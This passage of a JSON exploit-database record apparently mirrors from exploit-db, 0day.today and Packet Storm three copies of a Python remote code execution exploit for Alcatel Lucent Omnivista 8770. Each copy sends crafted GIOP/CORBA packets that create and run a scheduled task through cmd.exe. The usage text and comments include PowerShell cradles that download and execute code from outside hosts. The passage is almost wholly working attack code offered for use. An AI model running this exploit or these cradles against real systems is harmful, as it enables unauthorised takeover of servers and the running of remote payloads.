\"Adding a task....\"\r\n\r\ntaskname = \"BBBBBBB\".encode('hex')\r\nservername = netbiosname.encode('hex')\r\ncommand = \"C:\\Windows\\System32\\cmd.exe\".encode('hex') #on 32bit\r\n#command = \"C:\\Windows\\SysWOW64\\cmd.exe\".encode('hex') #on 64bit\r\ncommandsize = hex((len(command.decode('hex'))+1))\r\ncommandsize = str(commandsize).replace(\"0x\",\"\")\r\n\r\n#print \"Command size: \"+ str(commandsize)\r\n\r\n#print command.decode('hex')\r\n\r\n#time.sleep(10)\r\n\r\n#powershell = str(command)\r\n#powershell = \"powershell.exe -nop -c $J=new-object net.webclient;IEX $J.downloadstring('http://192.168.1.40:8080/hello');\"\r\n\r\n#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');\r\n\r\n#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');\r\n\r\nargument = str(\"/c \"+argument1).encode('hex')\r\n#argument = str(\"/c notepad.exe\").encode('hex')\r\n\r\n#print len(argument.decode('hex'))\r\n\r\n#argumentsize = len(str(\"/c \"+powershell))+1\r\n\r\n#print \"Argument size: \"+str(argumentsize)\r\n\r\nargumentsize = calcstring2(argument)\r\n\r\n#print \"argument size: \"+str(argumentsize)\r\n\r\n#print argument.decode('hex')\r\n\r\ndef calcpadd(giop):\r\n\tdefaultpadding = \"00000000000001\"\r\n\tcheck = giop + defaultpadding + fixedpadding\r\n\ts = len(check)\r\n\t#print \"Size: \"+str(s)\r\n\tif (s/2) % 4 == 0:\r\n\t\t#print \"size ok!\"\r\n\t\treturn check\r\n\telse:\r\n\t\t# fix the default padding\r\n\t\t#print \"Size not ok, recalculating padd...\"\r\n\t\tdif = (s/2) % 4\r\n\t\t#print \"diff: \"+str(dif)\r\n\t\tnewpadding = defaultpadding[dif*2:]\r\n\t\t#print \"Newpadding: \" +str(newpadding)\r\n\t\treturn giop + newpadding + 
fixedpadding\r\n\r\n\r\n\r\n\r\naddjobhdr = \"47494f5001000000\" # 8 bytes + 4 bytes for message size, including size of the giop request message\r\n\r\nfixedpadding = \"000000000000000100000000000000010000000000000002000000000000000000000000000000000000000f0000000000000000000000000000000000000002000000000000000000000000\"\r\n\r\nvariablepadding = \"000000000001\"\r\n\r\n#print calcstring(servername)\r\n#print calcstring(taskname)\r\n\r\n#print \"Command:\" +str(command)\r\n#print \"command size:\"+str(commandsize)\r\n\r\naddjob = \"00000000000000b30100000000000010\" + objectkey + \"000000074164644a6f62000000000000000000\" + calcstring(taskname) + taskname + \"0000000001000000\"+ commandsize + command +\"00000000\" + calcstring(servername) + servername + \"000000\" + argumentsize + argument + \"00\"\r\n\r\n#print addjob\r\n\r\naddjobfin = calcpadd(addjob)\r\n\r\n#print addjobfin.decode('hex')\r\n\r\naddjobsize = calcsize(addjobfin)\r\n\r\n#print \"Lenght of the addjob: \"+str(len(addjobfin.decode('hex')))\r\n\r\n# we need to add the header\r\n\r\nfinalmsg = addjobhdr + addjobsize + addjobfin\r\n\r\n\r\np.send(finalmsg.decode('hex'))\r\n\r\ndata3 = p.recv(1024)\r\n\r\n#print data3\r\n\r\n# phase4 - execute task\r\n\r\nexecuteid = 4\r\n\r\nprint \"Executing task...\"\r\n\r\nexecute = \"47494f50010000000000003500000000000001100100000000000010\" + objectkey + \"0000000b457865637574654e6f7700000000000000\"\r\n\r\np.send(execute.decode('hex'))\r\n\r\ndata4 = p.recv(1024)\r\n\r\nprint \"All packets sent...\"\r\nprint \"Exploit sequence completed, command should have been executed...:-)\"\r\n\r\np.close()\r\n\r\n# optional requests to remove the job after the exploitation\r\n\r\n### in metasploit, we should migrate to another process and then call an \"abort\" function of Omnivista\r\n\r\n##phase5 - abort the job\r\n\r\ncanceljob = \"47494f500100000000000030000000000000008e0100000000000010\" + objectkey + \"0000000743616e63656c000000000000\"\r\n\r\n###phase6 - delete the 
jobset \r\n\r\ndeletejob = \"47494f500100000000000038000000000000009e0100000000000010\" + objectkey + \"0000000d44656c6574654a6f625365740000000000000000\"\t\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40862/"}], "zdt": [{"lastseen": "2018-03-17T03:08:49", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "href": "https://0day.today/exploit/description/26467", "id": "1337DAY-ID-26467", "title": "Alcatel Lucent Omnivista 8770 - Remote Code Execution Exploit", "type": "zdt", "sourceData": "import socket\r\nimport time\r\nimport sys\r\nimport os\r\n \r\n# ref https://blog.malerisch.net/\r\n# Omnivista Alcatel-Lucent running on Windows Server\r\n \r\n \r\nif len(sys.argv) < 2:\r\n print \"Usage: %s <target> <command>\" % sys.argv[0]\r\n print \"eg: %s 192.168.1.246 \\\"powershell.exe -nop -w hidden -c \\$g=new-object net.webclient;IEX \\$g.downloadstring('http://192.168.1.40:8080/hello');\\\"\" % sys.argv[0]\r\n sys.exit(1)\r\n \r\ntarget = sys.argv[1]\r\nargument1 = ' '.join(sys.argv[2:])\r\n \r\n# so we need to get the biosname of the target... 
so run this poc exploit script should be run in kali directly...\r\n \r\nnetbiosname = os.popen(\"nbtscan -s : \"+target+\" | cut -d ':' -f2\").read()\r\nnetbiosname = netbiosname.strip(\"\\n\")\r\n \r\n# dirty functions to do hex magic with bytes...\r\n### each variable has size byte before, which includes the string + \"\\x00\" a NULL byte\r\n### needs to calculate for each\r\n### \r\n \r\ndef calcsize(giop):\r\n \r\n s = len(giop.decode('hex'))\r\n h = hex(s) #\"\\x04\" -> \"04\"\r\n return h[2:].zfill(8) # it's 4 bytes for the size\r\n \r\ndef calcstring(param): # 1 byte size calc\r\n \r\n s = (len(param)/2)+1\r\n h = hex(s)\r\n return h[2:].zfill(2) # assuming it is only 1 byte , again it's dirty...\r\n \r\ndef calcstring2(param):\r\n \r\n s = (len(param)/2)+1\r\n h = hex(s)\r\n return h[2:].zfill(4)\r\n \r\n \r\n \r\n##\r\n \r\n#GIOP request size is specified at the 11th byte\r\n \r\n# 0000 47 49 4f 50 01 00 00 00 00 00 00 d8 00 00 00 00 GIOP............\r\n# d8 is the size of GIOP REQUEST\r\n \r\n# GIOP HEADER Is 12 bytes -\r\n# GIOP REQUEST PAYLOAD comes after and it's defined at the 11th byte\r\n \r\n \r\n \r\n#phase 1 - add a jobset\r\n \r\ngiopid = 1 # an arbitrary ID can be put there...\r\n \r\n# there are checks in the size of the username.. 
need to find where the size is specified - anyway, 58 bytes seems all right...\r\n \r\nusernamedata = \"xxx.y.zzzzz,cn=Administrators,cn=8770 administration,o=nmc\".encode('hex') # original \"383737302061646d696e697374726174696f6e2c6f3d6e6d63\"\r\n \r\n#print \"Size of usernamedata\" + str(len(usernamedata.decode('hex')))\r\n \r\njobname = \"MYJOB01\".encode('hex') # size of 7 bytes # check also in the captured packet...\r\n \r\n \r\naddjobset = \"47494f50010000000000012600000000\" + \"00000001\" + \"01000000000000135363686564756c6572496e7465726661636500000000000a4164644a6f625365740000000000000000000008\" + jobname + \"00000007e0000000060000001b00000010000000240000000000000000000000000000000000000000000000000000000000000000002a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000083131313131313100010000000000000000000000000000010000000000000000000000000000003f7569643d\" + usernamedata + \"00000000000a6f6d6e69766973626200\" # this last part can be changed???\r\n \r\nprint \"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0 - RCE via GIOP/CORBA - @malerisch\"\r\nprint \"Connecting to target...\"\r\n \r\n \r\n \r\n \r\np = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\np.connect((target, 30024))\r\n \r\n \r\n#p = remote(target, 30024, \"ipv4\", \"tcp\")\r\n \r\nprint \"Adding a job...\"\r\n \r\np.send(addjobset.decode('hex'))\r\n \r\n#p.recv()\r\n \r\ndata = p.recv(1024)\r\n \r\ns = len(data)\r\n \r\n#objectkey = \"\" # last 16 bytes of the response!\r\n \r\nobjectkey = data[s-16:s].encode('hex')\r\n \r\n#print objectkey\r\n \r\n# phase 2 - active jobset\r\n \r\nprint \"Sending active packet against the job\"\r\n \r\nactivegiopid = 2\r\nactive = \"47494f50010000000000003100000000\" + \"00000002\" + \"0100000000000010\" + objectkey + \"0000000741637469766500000000000000\"\r\n \r\n#print active\r\n \r\np.send(active.decode('hex'))\r\n \r\ndata2 = p.recv(1024)\r\n \r\n#print data2\r\n \r\n# phase3 add task\r\n 
\r\naddjobid = 3\r\n \r\nprint \"Adding a task....\"\r\n \r\ntaskname = \"BBBBBBB\".encode('hex')\r\nservername = netbiosname.encode('hex')\r\ncommand = \"C:\\Windows\\System32\\cmd.exe\".encode('hex') #on 32bit\r\n#command = \"C:\\Windows\\SysWOW64\\cmd.exe\".encode('hex') #on 64bit\r\ncommandsize = hex((len(command.decode('hex'))+1))\r\ncommandsize = str(commandsize).replace(\"0x\",\"\")\r\n \r\n#print \"Command size: \"+ str(commandsize)\r\n \r\n#print command.decode('hex')\r\n \r\n#time.sleep(10)\r\n \r\n#powershell = str(command)\r\n#powershell = \"powershell.exe -nop -c $J=new-object net.webclient;IEX $J.downloadstring('http://192.168.1.40:8080/hello');\"\r\n \r\n#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');\r\n \r\n#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');\r\n \r\nargument = str(\"/c \"+argument1).encode('hex')\r\n#argument = str(\"/c notepad.exe\").encode('hex')\r\n \r\n#print len(argument.decode('hex'))\r\n \r\n#argumentsize = len(str(\"/c \"+powershell))+1\r\n \r\n#print \"Argument size: \"+str(argumentsize)\r\n \r\nargumentsize = calcstring2(argument)\r\n \r\n#print \"argument size: \"+str(argumentsize)\r\n \r\n#print argument.decode('hex')\r\n \r\ndef calcpadd(giop):\r\n defaultpadding = \"00000000000001\"\r\n check = giop + defaultpadding + fixedpadding\r\n s = len(check)\r\n #print \"Size: \"+str(s)\r\n if (s/2) % 4 == 0:\r\n #print \"size ok!\"\r\n return check\r\n else:\r\n # fix the default padding\r\n #print \"Size not ok, recalculating padd...\"\r\n dif = (s/2) % 4\r\n #print \"diff: \"+str(dif)\r\n newpadding = defaultpadding[dif*2:]\r\n #print \"Newpadding: \" +str(newpadding)\r\n return giop + newpadding + 
fixedpadding\r\n \r\n \r\n \r\n \r\naddjobhdr = \"47494f5001000000\" # 8 bytes + 4 bytes for message size, including size of the giop request message\r\n \r\nfixedpadding = \"000000000000000100000000000000010000000000000002000000000000000000000000000000000000000f0000000000000000000000000000000000000002000000000000000000000000\"\r\n \r\nvariablepadding = \"000000000001\"\r\n \r\n#print calcstring(servername)\r\n#print calcstring(taskname)\r\n \r\n#print \"Command:\" +str(command)\r\n#print \"command size:\"+str(commandsize)\r\n \r\naddjob = \"00000000000000b30100000000000010\" + objectkey + \"000000074164644a6f62000000000000000000\" + calcstring(taskname) + taskname + \"0000000001000000\"+ commandsize + command +\"00000000\" + calcstring(servername) + servername + \"000000\" + argumentsize + argument + \"00\"\r\n \r\n#print addjob\r\n \r\naddjobfin = calcpadd(addjob)\r\n \r\n#print addjobfin.decode('hex')\r\n \r\naddjobsize = calcsize(addjobfin)\r\n \r\n#print \"Lenght of the addjob: \"+str(len(addjobfin.decode('hex')))\r\n \r\n# we need to add the header\r\n \r\nfinalmsg = addjobhdr + addjobsize + addjobfin\r\n \r\n \r\np.send(finalmsg.decode('hex'))\r\n \r\ndata3 = p.recv(1024)\r\n \r\n#print data3\r\n \r\n# phase4 - execute task\r\n \r\nexecuteid = 4\r\n \r\nprint \"Executing task...\"\r\n \r\nexecute = \"47494f50010000000000003500000000000001100100000000000010\" + objectkey + \"0000000b457865637574654e6f7700000000000000\"\r\n \r\np.send(execute.decode('hex'))\r\n \r\ndata4 = p.recv(1024)\r\n \r\nprint \"All packets sent...\"\r\nprint \"Exploit sequence completed, command should have been executed...:-)\"\r\n \r\np.close()\r\n \r\n# optional requests to remove the job after the exploitation\r\n \r\n### in metasploit, we should migrate to another process and then call an \"abort\" function of Omnivista\r\n \r\n##phase5 - abort the job\r\n \r\ncanceljob = \"47494f500100000000000030000000000000008e0100000000000010\" + objectkey + 
\"0000000743616e63656c000000000000\"\r\n \r\n###phase6 - delete the jobset \r\n \r\ndeletejob = \"47494f500100000000000038000000000000009e0100000000000010\" + objectkey + \"0000000d44656c6574654a6f625365740000000000000000\"\n\n# 0day.today [2018-03-17] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/26467"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:23", "bulletinFamily": "exploit", "description": "", "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "href": "https://packetstormsecurity.com/files/140026/Alcatel-Lucent-Omnivista-8770-Remote-Code-Execution.html", "id": "PACKETSTORM:140026", "type": "packetstorm", "title": "Alcatel Lucent Omnivista 8770 Remote Code Execution", "sourceData": "`import socket \nimport time \nimport sys \nimport os \n \n# ref https://blog.malerisch.net/ \n# Omnivista Alcatel-Lucent running on Windows Server \n \n \nif len(sys.argv) < 2: \nprint \"Usage: %s <target> <command>\" % sys.argv[0] \nprint \"eg: %s 192.168.1.246 \\\"powershell.exe -nop -w hidden -c \\$g=new-object net.webclient;IEX \\$g.downloadstring('http://192.168.1.40:8080/hello');\\\"\" % sys.argv[0] \nsys.exit(1) \n \ntarget = sys.argv[1] \nargument1 = ' '.join(sys.argv[2:]) \n \n# so we need to get the biosname of the target... so run this poc exploit script should be run in kali directly... \n \nnetbiosname = os.popen(\"nbtscan -s : \"+target+\" | cut -d ':' -f2\").read() \nnetbiosname = netbiosname.strip(\"\\n\") \n \n# dirty functions to do hex magic with bytes... 
\n### each variable has size byte before, which includes the string + \"\\x00\" a NULL byte \n### needs to calculate for each \n### \n \ndef calcsize(giop): \n \ns = len(giop.decode('hex')) \nh = hex(s) #\"\\x04\" -> \"04\" \nreturn h[2:].zfill(8) # it's 4 bytes for the size \n \ndef calcstring(param): # 1 byte size calc \n \ns = (len(param)/2)+1 \nh = hex(s) \nreturn h[2:].zfill(2) # assuming it is only 1 byte , again it's dirty... \n \ndef calcstring2(param): \n \ns = (len(param)/2)+1 \nh = hex(s) \nreturn h[2:].zfill(4) \n \n \n \n## \n \n#GIOP request size is specified at the 11th byte \n \n# 0000 47 49 4f 50 01 00 00 00 00 00 00 d8 00 00 00 00 GIOP............ \n# d8 is the size of GIOP REQUEST \n \n# GIOP HEADER Is 12 bytes - \n# GIOP REQUEST PAYLOAD comes after and it's defined at the 11th byte \n \n \n \n#phase 1 - add a jobset \n \ngiopid = 1 # an arbitrary ID can be put there... \n \n# there are checks in the size of the username.. need to find where the size is specified - anyway, 58 bytes seems all right... \n \nusernamedata = \"xxx.y.zzzzz,cn=Administrators,cn=8770 administration,o=nmc\".encode('hex') # original \"383737302061646d696e697374726174696f6e2c6f3d6e6d63\" \n \n#print \"Size of usernamedata\" + str(len(usernamedata.decode('hex'))) \n \njobname = \"MYJOB01\".encode('hex') # size of 7 bytes # check also in the captured packet... \n \n \naddjobset = \"47494f50010000000000012600000000\" + \"00000001\" + \"01000000000000135363686564756c6572496e7465726661636500000000000a4164644a6f625365740000000000000000000008\" + jobname + \"00000007e0000000060000001b00000010000000240000000000000000000000000000000000000000000000000000000000000000002a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000083131313131313100010000000000000000000000000000010000000000000000000000000000003f7569643d\" + usernamedata + \"00000000000a6f6d6e69766973626200\" # this last part can be changed??? 
\n \nprint \"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0 - RCE via GIOP/CORBA - @malerisch\" \nprint \"Connecting to target...\" \n \n \n \n \np = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \np.connect((target, 30024)) \n \n \n#p = remote(target, 30024, \"ipv4\", \"tcp\") \n \nprint \"Adding a job...\" \n \np.send(addjobset.decode('hex')) \n \n#p.recv() \n \ndata = p.recv(1024) \n \ns = len(data) \n \n#objectkey = \"\" # last 16 bytes of the response! \n \nobjectkey = data[s-16:s].encode('hex') \n \n#print objectkey \n \n# phase 2 - active jobset \n \nprint \"Sending active packet against the job\" \n \nactivegiopid = 2 \nactive = \"47494f50010000000000003100000000\" + \"00000002\" + \"0100000000000010\" + objectkey + \"0000000741637469766500000000000000\" \n \n#print active \n \np.send(active.decode('hex')) \n \ndata2 = p.recv(1024) \n \n#print data2 \n \n# phase3 add task \n \naddjobid = 3 \n \nprint \"Adding a task....\" \n \ntaskname = \"BBBBBBB\".encode('hex') \nservername = netbiosname.encode('hex') \ncommand = \"C:\\Windows\\System32\\cmd.exe\".encode('hex') #on 32bit \n#command = \"C:\\Windows\\SysWOW64\\cmd.exe\".encode('hex') #on 64bit \ncommandsize = hex((len(command.decode('hex'))+1)) \ncommandsize = str(commandsize).replace(\"0x\",\"\") \n \n#print \"Command size: \"+ str(commandsize) \n \n#print command.decode('hex') \n \n#time.sleep(10) \n \n#powershell = str(command) \n#powershell = \"powershell.exe -nop -c $J=new-object net.webclient;IEX $J.downloadstring('http://192.168.1.40:8080/hello');\" \n \n#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/'); \n \n#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/'); \n \nargument = 
str(\"/c \"+argument1).encode('hex') \n#argument = str(\"/c notepad.exe\").encode('hex') \n \n#print len(argument.decode('hex')) \n \n#argumentsize = len(str(\"/c \"+powershell))+1 \n \n#print \"Argument size: \"+str(argumentsize) \n \nargumentsize = calcstring2(argument) \n \n#print \"argument size: \"+str(argumentsize) \n \n#print argument.decode('hex') \n \ndef calcpadd(giop): \ndefaultpadding = \"00000000000001\" \ncheck = giop + defaultpadding + fixedpadding \ns = len(check) \n#print \"Size: \"+str(s) \nif (s/2) % 4 == 0: \n#print \"size ok!\" \nreturn check \nelse: \n# fix the default padding \n#print \"Size not ok, recalculating padd...\" \ndif = (s/2) % 4 \n#print \"diff: \"+str(dif) \nnewpadding = defaultpadding[dif*2:] \n#print \"Newpadding: \" +str(newpadding) \nreturn giop + newpadding + fixedpadding \n \n \n \n \naddjobhdr = \"47494f5001000000\" # 8 bytes + 4 bytes for message size, including size of the giop request message \n \nfixedpadding = \"000000000000000100000000000000010000000000000002000000000000000000000000000000000000000f0000000000000000000000000000000000000002000000000000000000000000\" \n \nvariablepadding = \"000000000001\" \n \n#print calcstring(servername) \n#print calcstring(taskname) \n \n#print \"Command:\" +str(command) \n#print \"command size:\"+str(commandsize) \n \naddjob = \"00000000000000b30100000000000010\" + objectkey + \"000000074164644a6f62000000000000000000\" + calcstring(taskname) + taskname + \"0000000001000000\"+ commandsize + command +\"00000000\" + calcstring(servername) + servername + \"000000\" + argumentsize + argument + \"00\" \n \n#print addjob \n \naddjobfin = calcpadd(addjob) \n \n#print addjobfin.decode('hex') \n \naddjobsize = calcsize(addjobfin) \n \n#print \"Lenght of the addjob: \"+str(len(addjobfin.decode('hex'))) \n \n# we need to add the header \n \nfinalmsg = addjobhdr + addjobsize + addjobfin \n \n \np.send(finalmsg.decode('hex')) \n \ndata3 = p.recv(1024) \n \n#print data3 \n \n# phase4 - execute 
task \n \nexecuteid = 4 \n \nprint \"Executing task...\" \n \nexecute = \"47494f50010000000000003500000000000001100100000000000010\" + objectkey + \"0000000b457865637574654e6f7700000000000000\" \n \np.send(execute.decode('hex')) \n \ndata4 = p.recv(1024) \n \nprint \"All packets sent...\" \nprint \"Exploit sequence completed, command should have been executed...:-)\" \n \np.close() \n \n# optional requests to remove the job after the exploitation \n \n### in metasploit, we should migrate to another process and then call an \"abort\" function of Omnivista \n \n##phase5 - abort the job \n \ncanceljob = \"47494f500100000000000030000000000000008e0100000000000010\" + objectkey + \"0000000743616e63656c000000000000\" \n \n###phase6 - delete the jobset \n \ndeletejob = \"47494f500100000000000038000000000000009e0100000000000010\" + objectkey + \"0000000d44656c6574654a6f625365740000000000000000\" \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/140026/alcatellucentomnivista-exec.txt"}]}